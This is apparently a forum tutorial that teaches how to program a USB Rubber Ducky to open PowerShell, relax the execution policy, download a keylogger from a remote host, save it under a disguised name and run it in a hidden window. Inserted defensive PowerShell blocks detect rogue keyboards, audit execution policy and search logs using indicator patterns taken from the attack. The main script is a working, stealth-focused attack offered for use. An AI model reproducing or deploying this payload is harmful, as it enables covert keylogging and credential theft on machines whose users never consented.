At the end of this small series you should be able to write your own scripts for hacking a box with just a USB stick and without needing to know any programming language!
Part 1: How to use DuckyScript to write a FUD file downloader & executor
Part 2: How to use PowerShell (Microsoft's newer shell; reminiscent of the Linux terminal) to write a FUD keylogger [Bonus]
Part 3: How to build your own BadUSB for around $10
USB Rubber Ducky
[quote]“If it quacks like a keyboard and types like a keyboard, it must be a keyboard.”
~ Rubber Ducky Wiki[/quote]
This little quote tells us the main idea behind BadUSB. It's a technique to convince the computer that we are not a USB stick (which can't execute anything on its own), but a completely normal and unsuspicious keyboard controlled by the user. This is useful, because keyboards are allowed to type (wow, big surprise).
[quote]“Humans use keyboards, and computers trust humans.”
~ Rubber Ducky Wiki[/quote]
The computer thinks we're a normal user who just wants to download a file via PowerShell. That's nothing disallowed, so it goes pretty much unnoticed. If any warnings pop up, like "Don't trust files from the internet", we just press Enter and skip them, because the keyboard rules!
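The flip side of "computers trust keyboards" is that the device still has to show up as a keyboard, and Windows keeps a record of that. The script below is an added example and not part of the original post: it inventories the keyboards Windows currently sees (a BadUSB or Rubber Ducky appears as one more HID keyboard), flags any whose USB vendor/product id is not on an allow-list, and lists recent keyboard arrivals from the Security log. It assumes the PnpDevice module (Windows 8 / Server 2012 R2 or later) and, for the event query, an elevated session with the "Audit PnP Activity" subcategory enabled; the allow-list values are placeholders I made up.

```powershell
# Added example, not part of the original post: find keyboards a host was not
# issued with. Assumes the PnpDevice module; the event query additionally needs
# an elevated session and "Audit PnP Activity" turned on.

# Constructed allow-list of VID:PID pairs for issued keyboards. Placeholder values;
# a real deployment takes these from the hardware inventory.
$KnownKeyboards = @('046D:C31C', '413C:2107')

function Get-KeyboardInventory {
    Get-PnpDevice -Class Keyboard -PresentOnly -ErrorAction SilentlyContinue | ForEach-Object {
        # USB/HID instance ids carry VID_xxxx&PID_xxxx; PS/2 and virtual keyboards do not.
        $vidPid = $null
        if ($_.InstanceId -match 'VID_([0-9A-F]{4}).*?PID_([0-9A-F]{4})') {
            $vidPid = ('{0}:{1}' -f $Matches[1], $Matches[2]).ToUpper()
        }
        [pscustomobject]@{
            FriendlyName = $_.FriendlyName
            InstanceId   = $_.InstanceId
            VidPid       = $vidPid
            Status       = $_.Status
        }
    }
}

function Find-UnknownKeyboards {
    param([string[]]$AllowList = $KnownKeyboards)
    # Keyboards without a VID:PID are reported too, so a human looks at them.
    Get-KeyboardInventory | Where-Object {
        (-not $_.VidPid) -or ($AllowList -notcontains $_.VidPid)
    }
}

function Get-RecentKeyboardArrivals {
    param([int]$Hours = 24)
    # Security event 6416 ("A new external device was recognized by the system")
    # is only written when "Audit PnP Activity" is enabled; otherwise nothing comes back.
    $filter = @{ LogName = 'Security'; Id = 6416; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'Class Name:\s*Keyboard' } |
        ForEach-Object {
            $desc = if ($_.Message -match 'Device (?:Name|Description):\s*(.+)') { $Matches[1].Trim() } else { '' }
            [pscustomobject]@{ Time = $_.TimeCreated; Device = $desc }
        }
}

"Keyboards not on the allow-list:"
Find-UnknownKeyboards | Format-Table -AutoSize
"Keyboards attached in the last 24 hours (needs PnP auditing):"
Get-RecentKeyboardArrivals | Format-Table -AutoSize
```

Enumeration only tells you after the fact. The preventive control on managed Windows hosts is the Device Installation Restrictions Group Policy (allow only listed device IDs or classes), which stops an unknown HID keyboard from being installed in the first place.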
Do I need the Rubber Ducky?
I recommend using a Rubber Ducky for the following, but it's not required. In the third part I'll explain how to build your own BadUSB for about $10! However, that one is much harder to reprogram and to work with, so I highly recommend buying a Rubber Ducky once you're hooked.
You can get it for $44.99 at the Hak5 shop. The decision is yours.
DuckyScript - Introduction
Now we've got a USB stick with a personality disorder that thinks it's a keyboard, but how does it know what to do on the target system? The answer is a scripting language called DuckyScript. Its syntax is pretty straightforward, its requirements are nearly non-existent and the intelligence needed is just ridiculous.
- Any text editor
I think you'll find one... gedit, the Windows editor, vim, etc.
The default Duckencoder.jar can be found on GitHub. However, I had some problems due to different keyboard layouts and searched for an alternative, so I stumbled upon this thread. There you can download a custom version of the Duckencoder which supports different keyboard layouts.
DuckyScript - Our Script
I'll cover just the basics and not all the keys you can use, because they can already be found here.
- You have to write every command on a new line
- Don't use blank lines (never read it anywhere, but they seemed to break my script)
- Use REM for comments
- Use STRING for typing normal text (it automatically presses Shift when you use upper-case letters and symbols like !"§$)
- Use GUI for pressing the Windows key
- Use ENTER for pressing Enter (wow, that's insane)
- Use DELAY for waiting (in milliseconds) between commands
That's all I needed to write my downloader & executor script!
Example Powershell Script Downloader & Executor
[code]REM Set Execution Policy
DELAY 2000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 4000
STRING Set-ExecutionPolicy -Scope CurrentUser Unrestricted
ENTER
DELAY 1000
REM Confirm the policy change prompt
STRING J
ENTER
DELAY 300[/code]
First we set the PowerShell ExecutionPolicy setting to Unrestricted, so that our script can be executed on the target system. Maybe you've noticed that we only change the CurrentUser setting. This requires no special privileges and works just as well as changing the whole machine's settings.
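The CurrentUser trick works because, when every other scope is Undefined, CurrentUser is the first scope PowerShell consults; a MachinePolicy or UserPolicy set by Group Policy takes precedence over it. The script below is an added example and not part of the original post: it audits every execution policy scope on a Windows host, reports which scope decides the effective policy, and flags exactly the change the Ducky script makes. It assumes Windows PowerShell 5.1 or later; the registry path is the documented location of the CurrentUser scope.

```powershell
# Added example, not part of the original post: audit the PowerShell execution
# policy scopes and flag a relaxed CurrentUser scope. Assumes Windows PowerShell 5.1+.

function Get-ExecutionPolicyAudit {
    # Scopes in precedence order; the first scope that is not Undefined wins.
    # A Group Policy (MachinePolicy/UserPolicy) therefore beats CurrentUser, which
    # is why "-Scope CurrentUser Unrestricted" has no effect on a managed host.
    $precedence = @('MachinePolicy', 'UserPolicy', 'Process', 'CurrentUser', 'LocalMachine')

    $policies = @{}
    foreach ($entry in Get-ExecutionPolicy -List) {
        $policies[$entry.Scope.ToString()] = $entry.ExecutionPolicy.ToString()
    }

    # When every scope is Undefined, Windows clients default to Restricted
    # (Windows Server to RemoteSigned).
    $effective = 'Restricted'
    $decidedBy = 'default'
    foreach ($scope in $precedence) {
        if ($policies[$scope] -and $policies[$scope] -ne 'Undefined') {
            $effective = $policies[$scope]
            $decidedBy = $scope
            break
        }
    }

    # The CurrentUser scope is persisted in this registry value; the payload writes it.
    $regPath = 'HKCU:\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell'
    $stored = (Get-ItemProperty -Path $regPath -Name ExecutionPolicy -ErrorAction SilentlyContinue).ExecutionPolicy

    $relaxed = $policies['CurrentUser'] -in @('Unrestricted', 'Bypass')
    $finding = if ($relaxed) { "CurrentUser scope relaxed to $($policies['CurrentUser'])" } else { 'CurrentUser scope not relaxed' }

    [pscustomobject]@{
        Effective           = $effective
        DecidedByScope      = $decidedBy
        CurrentUserPolicy   = $policies['CurrentUser']
        CurrentUserRegistry = $stored
        ManagedByGPO        = ($decidedBy -in @('MachinePolicy', 'UserPolicy'))
        Finding             = $finding
    }
}

function Reset-CurrentUserExecutionPolicy {
    # Revert the user-scope change; Undefined lets the machine or default policy apply again.
    Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Undefined -Force
}

Get-ExecutionPolicyAudit | Format-List
```

Keep in mind that Microsoft documents the execution policy as a safety feature, not a security boundary: a user who can type `powershell -ExecutionPolicy Bypass` was never stopped by it. Enforcing the scope through Group Policy removes this particular step from the payload, but the real controls are script logging and application allow-listing.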
[code]REM Download Keylogger
STRING (new-object System.Net.WebClient).DownloadFile("http://example.net/keylogger.ps1", "WinSys32.ps1")
ENTER
DELAY 2000
STRING exit
ENTER
DELAY 300[/code]
Next we download the PowerShell script. This uses the .NET WebClient, which can be called from within PowerShell (during my little journey through keyloggers I've found PowerShell just awesome; I highly recommend everyone to have a look at it. Maybe I'll make some basic tutorials about it in the future). The command downloads the file from the given website, where you've put the script (http://example.net/keylogger.ps1), and saves it under the given path (as an example I use the current directory (the user's profile directory) and the name "WinSys32.ps1"). Then we leave the PowerShell console.
[code]REM Run Keylogger
GUI r
DELAY 300
STRING powershell -windowstyle hidden ./WinSys32.ps1
ENTER[/code]
Finally we run the script as a background PowerShell process. This has two big advantages:
- The user can't spot it easily
- It runs under the name "Windows PowerShell" with the default PowerShell icon. No user will think his own Windows spies on him. (Oh, and AVs don't care either; more on that in the next part)
Here's the full script, so that you don't have to put the pieces together.
[code]REM Download & Execute Powershell Script
REM ~ TheDoctor v220.127.116.11
REM Set Execution Policy
DELAY 2000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 4000
STRING Set-ExecutionPolicy -Scope CurrentUser Unrestricted
ENTER
DELAY 1000
STRING J
ENTER
DELAY 300
REM Download Keylogger
STRING (new-object System.Net.WebClient).DownloadFile("http://example.net/keylogger.ps1", "WinSys32.ps1")
ENTER
DELAY 2000
STRING exit
ENTER
DELAY 300
REM Run Keylogger
GUI r
DELAY 300
STRING powershell -windowstyle hidden ./WinSys32.ps1
ENTER[/code]
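Everything this script types ends up in a PowerShell console, and PowerShell can be told to record it. The script below is an added example and not part of the original post: it checks whether script block logging is enabled, enables it the same way the Group Policy setting does, and then hunts the PowerShell operational log for the three commands the Ducky script types. The indicator patterns are built from the script in this post; the hours/event limits are defaults I chose, and the queries assume an elevated Windows PowerShell 5.1 or later session.

```powershell
# Added example, not part of the original post: check/enable script block logging
# and search 4104 events for the commands typed by the downloader script.
# Assumes an elevated Windows PowerShell 5.1+ session.

$sblPath = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'

function Test-ScriptBlockLogging {
    # $true when the policy value EnableScriptBlockLogging is set to 1.
    $v = Get-ItemProperty -Path $sblPath -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue
    return ($null -ne $v -and $v.EnableScriptBlockLogging -eq 1)
}

function Enable-ScriptBlockLogging {
    # Writes the same value as the Group Policy "Turn on PowerShell Script Block Logging".
    # Even without it, PowerShell 5+ logs blocks it considers suspicious on its own.
    if (-not (Test-Path $sblPath)) { New-Item -Path $sblPath -Force | Out-Null }
    New-ItemProperty -Path $sblPath -Name EnableScriptBlockLogging -Value 1 -PropertyType DWord -Force | Out-Null
}

# Indicators derived from the script in this post (constructed regex list).
$indicators = @(
    'Set-ExecutionPolicy\s+-Scope\s+CurrentUser\s+Unrestricted',
    'System\.Net\.WebClient.*DownloadFile',
    '-windowstyle\s+hidden'
)

function Find-SuspiciousScriptBlocks {
    param([int]$MaxEvents = 2000, [int]$Hours = 24)
    $filter = @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = (Get-Date).AddHours(-$Hours)
    }
    Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Property index 2 of a 4104 event is ScriptBlockText; fall back to the rendered message.
            $text = if ($_.Properties.Count -gt 2) { [string]$_.Properties[2].Value } else { [string]$_.Message }
            foreach ($pattern in $indicators) {
                if ($text -match $pattern) {
                    [pscustomobject]@{
                        Time      = $_.TimeCreated
                        Indicator = $pattern
                        Snippet   = $text.Substring(0, [Math]::Min(120, $text.Length))
                    }
                    break
                }
            }
        }
}

if (-not (Test-ScriptBlockLogging)) {
    Write-Warning 'Script block logging is off; 4104 events will be incomplete until it is enabled.'
}
Find-SuspiciousScriptBlocks | Format-Table -AutoSize
```

The `-windowstyle hidden` launch is also visible as a process creation (Security event 4688) when command-line auditing is enabled, which catches the third step even if the script body itself never gets logged.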
How To Put That Script On Your Bad USB?
With the USB Rubber Ducky it's very easy. Just take the Micro-SD card, put it in a Micro-SD to SD adapter and plug it into your computer. Then build the script with the Duckencoder (script.txt being your DuckyScript file):
[code]java -jar Duckencoder.jar -i script.txt -o inject.bin[/code]
Or, when you want to compile with a specified keyboard layout (only possible with the modified Duckencoder):
[code]java -jar Duckencoder.jar -i script.txt -o inject.bin -l <layout>[/code]
-i is the input file
-o is the output file
-l is the keyboard layout (check the linked thread for all possible layouts)
Now copy inject.bin (no other name is allowed; the script has to be named inject.bin) to the Micro-SD card and plug it back into your Rubber Ducky. Finished.
With Bad USB it’s much more complicated, so I’ll explain it in the third part of the series.
You can find many different DuckyScripts here. It's a good place to look for techniques you can use when writing your own scripts (or to find scripts for trolling your friends, e.g. this one). There are some very interesting ones like mimikatz, the utilman exploit or a WIFI password grabber.
Is it really that easy? Yes. Just write your own simple DuckyScript, plug in your BadUSB and... you're done. Oh, and don't forget that you feel like a real 1337 h4xx0r when all you have to do is plug in your stick and watch windows magically pop up and fill with commands without anyone's interaction.
In the next part we'll talk about the PowerShell script you have to download. Don't expect a big introduction to PowerShell, because I'm just a beginner, but I'm looking forward to explaining some basics to you.